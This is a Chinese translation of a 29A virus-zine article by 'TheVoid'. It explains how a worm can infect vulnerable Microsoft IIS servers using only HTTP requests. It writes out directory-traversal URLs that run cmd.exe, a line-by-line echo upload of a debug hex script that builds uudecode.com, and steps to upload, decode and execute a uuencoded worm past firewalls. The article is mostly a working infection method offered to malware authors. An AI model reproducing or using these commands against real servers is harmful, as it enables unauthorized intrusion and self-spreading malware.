文章作者:翻译delphij
信息来源:cvc
根据29A-6的原文翻译
-=[ Biocode uploading using only HTTP. ]=-
by TheVoid '11111010001
简介
-=-=-
全球范围内,大量的IIS服务器被各式各样的蠕虫感染,这些蠕虫都利用了M$ IIS的成千上万的漏洞中的某些,但它们都采用TFTP来上传他们的代码……
相关的别名 :
[A] -> 虫
[B] -> 被感染的服务器
[C] -> 存在漏洞的,可以被感染的服务器
现在的场景 :
[B] -------=( 可以被利用的漏洞 )=------> [C] (对B执行TFTP)
[B] <------=( TFTP GET WORM )=-------------------------- [C]
[B] -------=( 执行下载下来的虫 )=------------------> [C]
[B] (已经感染) [C] (已经感染)
呃……这里我们需要一个反向的连接,以便完成感染,当然,我们现在有了新的方法!
一天晚上,GriY0 和我讨论了一些有趣的东西,其中包括了上传代码到其他服务器的一种另类的方法。
注意 ... x) 这个办法非常有意思 ...
理论
-=-=-
今天,任何人都能够成功地攻陷一台存在漏洞的IIS服务器,简单地打开浏览器,并执行类似下面的命令:
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
http://www.retards.org/scripts/. ... 32/cmd.exe?/c+echo+"I'm%20a%20retarded"
-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
没错,他在服务器端执行了一些命令……现在,这家伙知道用一些命令,比如说,TFTP来上传或下载一些东西,嗯,一切都还看得过去。
现在蠕虫,通过与刚才的那个家伙类似的方法来传递代码,如果它足够的幸运,那么,另一台服务器也会被感染。
但使用这项技术你会遇到几个大问题:
问题 0x00 -> 防火墙。[B] 或 [C] 前面的防火墙可能会丢弃TFTP程序适用的UDP数据报,那么感染也就失败了
问题 0x01 -> 如果 B 在一个做了NAT的网络中,那么其他服务器不一定能够直接连接它的(蠕虫打开的) TFTP 服务器
问题 0x02 -> 蠕虫必须为TFTP监听一个端口 (69 UDP) 。如果有人在服务器执行netstat命令,那么他或她会发现端口开着。
新技术
-=-=-=-
但这并不妨碍我们使用其他方法向服务器传送代码!
呃……直到现在我们仍然可以在服务器上执行命令,那么,我们为什么不利用这一点在victim的硬盘上写代码呢?
"Exploit technique could be :
http://www.server.com/scripts/..%c0%af../"
[+] 感染步骤 1 --->
复制 cmd.exe 到另一个目录,并取一个新的名字 ...
http://exploittechnique/winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe
[+] 感染步骤 2 --->
上传引导代码 ... 一份编码为debug程序脚本的uudecode程序 怎么做呢?
一行一行地来
下面是用以创建uudecode.com的debug脚本:
--- BEGIN OF UUDECODE.SCR ---
E100 EB 54 90 49 6E 70 75 74 20 66 69 6C 65 20 65 72
E110 72 6F 72 2E 0D 0A 4F 75 74 70 75 74 20 66 69 6C
E120 65 20 65 72 72 6F 72 2E 0D 0A 73 74 61 72 74 20
E130 6E 6F 74 20 66 6F 75 6E 64 2E 0D 0A 45 6E 64 20
E140 6E 6F 74 20 66 6F 75 6E 64 2E 0D 0A 00 00 00 00
E150 64 03 64 03 14 03 E8 BE 01 E8 2D 01 BF 14 03 E8
E160 AA 00 AD 3D 62 65 75 F4 AD 3D 67 69 75 EE AD 3D
E170 6E 20 75 E8 BF 14 03 AC 3A C4 76 FB AC 3A C4 75
E180 FB AC 3A C4 76 FB 3A C4 74 04 AA AC EB F8 BA 14
E190 03 33 C9 88 0D B4 3C CD 21 73 03 E9 E3 00 A3 4E
E1A0 01 BF 14 03 E8 65 00 AC 0A C0 74 48 BB 20 20 2A
E1B0 C3 0A C0 74 3F 32 E4 8B E8 B9 04 06 AC 8A E0 AC
E1C0 8A D0 2B C3 D0 E4 D0 E4 D2 E8 0A C4 AA 4D 74 D4
E1D0 8A E2 AC 8A D0 2B C3 D2 E4 D0 E8 D0 E8 0A C4 AA
E1E0 4D 74 C1 8A E2 AC 2B C3 8A CD D2 E4 0A C4 AA 4D
E1F0 75 C7 EB B0 E8 15 00 AD 3D 65 6E 75 05 AC 3C 64
E200 74 03 E8 B0 00 E8 61 00 B4 4C CD 21 8B 36 50 01
E210 89 3E 54 01 BD 50 00 BF C4 02 33 C0 AB B9 27 00
E220 B8 20 20 F3 AB BF C4 02 3B 36 52 01 72 06 E8 38
E230 00 E8 55 00 AC 3C 60 75 04 B0 20 EB 08 3C 0D 74
E240 1B 3C 0A 74 18 AA 4D 75 DF 3B 36 52 01 72 03 E8
E250 37 00 AC 3C 0A 75 F2 BF 14 03 EB B4 46 89 36 50
E260 01 8B 3E 54 01 BE C4 02 C3 BA 14 03 8B CA 87 0E
E270 54 01 2B CA 76 0A 8B 1E 4E 01 B4 40 CD 21 72 01
E280 C3 BA 16 01 B9 14 00 EB 24 BA 64 03 B9 64 05 F7
E290 D1 8B 1E 4C 01 B4 3F CD 21 72 0C 0B C0 74 08 8B
E2A0 F2 03 C6 A3 52 01 C3 BA 03 01 B9 13 00 50 E8 0A
E2B0 00 58 E9 53 FF BA 3C 01 B9 10 00 BB 02 00 B4 40
E2C0 CD 21 C3 90 54 68 69 73 20 50 72 6F 67 72 61 6D
E2D0 20 52 65 71 75 69 72 65 73 20 44 4F 53 20 56 65
E2E0 72 73 69 6F 6E 20 32 2E 30 20 6F 72 20 68 69 67
E2F0 68 65 72 2E 0D 0A 24 0D 0A 49 6E 70 75 74 20 70
E300 61 74 68 2F 66 69 6C 65 3A 20 20 4E 6F 20 61 63
E310 74 69 6F 6E 0D 0A 24 B4 30 CD 21 3C 02 73 0C BA
E320 C4 02 B4 09 CD 21 B8 01 4C CD 21 BE 80 00 BF 84
E330 03 FC AC 0A C0 74 15 B4 20 AC 3A C4 76 FB 3A C4
E340 76 04 AA AC EB F8 81 FF 84 03 77 1C BA F7 02 B9
E350 14 00 BB 02 00 B4 40 CD 21 8B D7 B9 50 00 33 DB
E360 B4 3F CD 21 03 F8 4F 4F BA 84 03 3B FA 77 05 BA
E370 0B 03 EB AE B8 00 3D 88 05 CD 21 72 04 A3 4C 01
E380 C3 E9 23 FF DA
Rcx
0284
N uudecode.com
W
Q
----EOF----
为了上传它,我们需要使用下面的命令:
._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
http://explotationtechnique/inetpub/scripts/cmd1.exe?/c+echo+
"E100%20EB%2054%2090%2049%206E%2070%2075%2074%2020%2066%2069%206C%2065%2020%2065%2072"+>>uudecode.scr
._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
当然了,有了第一行,我们就知道后面该怎么写了
[+] 感染步骤 3 --->
现在,我们已经把 debug.scr 弄到服务器上了,接下来转换它
通过下面的方法执行命令 "debug < uudecode.scr" :
._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
http://exploittechnique/inetpub/scripts/cmd1.exe?/c+debug+"<uudecode.scr"
._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
现在我们已经有 uudecode.com 了!!!!!!!!!!!!!!!!
于是,我们可以完全不用TFTP,而只用HTTP请求来完成任务 ! OH YEAH !
到目前的阶段我们已经能够上传任何.com文件了,然我们更希望能够上传.exe文件,一般而言,.exe文件是不能单独用debug来创建的。
这也是我们为什么上传 uudecode.com 程序的原因
[+] 感染步骤 4 --->
现在,蠕虫应该使用uuencode来对它自己进行编码,用和前面一样的方法来上传一份uuencode过的蠕虫 例如, worm.uu
现在发出指令 : uudecode worm.uu 我们,终于得到了一个.exe ... 我们的虫 !
[+] 感染步骤 5 --->
发出新的指令执行新生成的 exe,然后……一些新的服务器被感染了!!....
-> 不使用 TFTP
我们只使用 HTTP 请求来上传文本文件 ("echo line>>file")
-> 绕过防火墙
我们只是在提交 HTTP 请求, 因此,如果存在防火墙的话,它也不得不让请求通过 xDDDDDDDDDDDDDDDDDDDDDD
步骤 1 : [A] ----=( 复制 cmd.exe 到另一个目录 )=-----> [C]
步骤 2 : [A] ----=( 逐行上传 uudecode.scr )=-----> [C]
步骤 3 : [A] ----=( 用debug得到 uudecode.com )=-----> [C]
步骤 4 : [A] ----=( 上传自己的 uuencode 编码 )=-----> [C]
步骤 5 : [A] ----=( uudecode,随后执行 )=-----> [C]
结束语
-=-=-=-=-=
不借助其他力量,仅仅使用蠕虫自己的代码来感染服务器是非常容易的
我希望这个技巧能够帮助别人
I am going to smoke something ... uhm... for example the cat xDDDDDDDDDDDDDD
._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._._.-:-._
Remember Luke, USE THE DRUGS !
The Void. (
thevoid@pobox.co.uk)
EOF
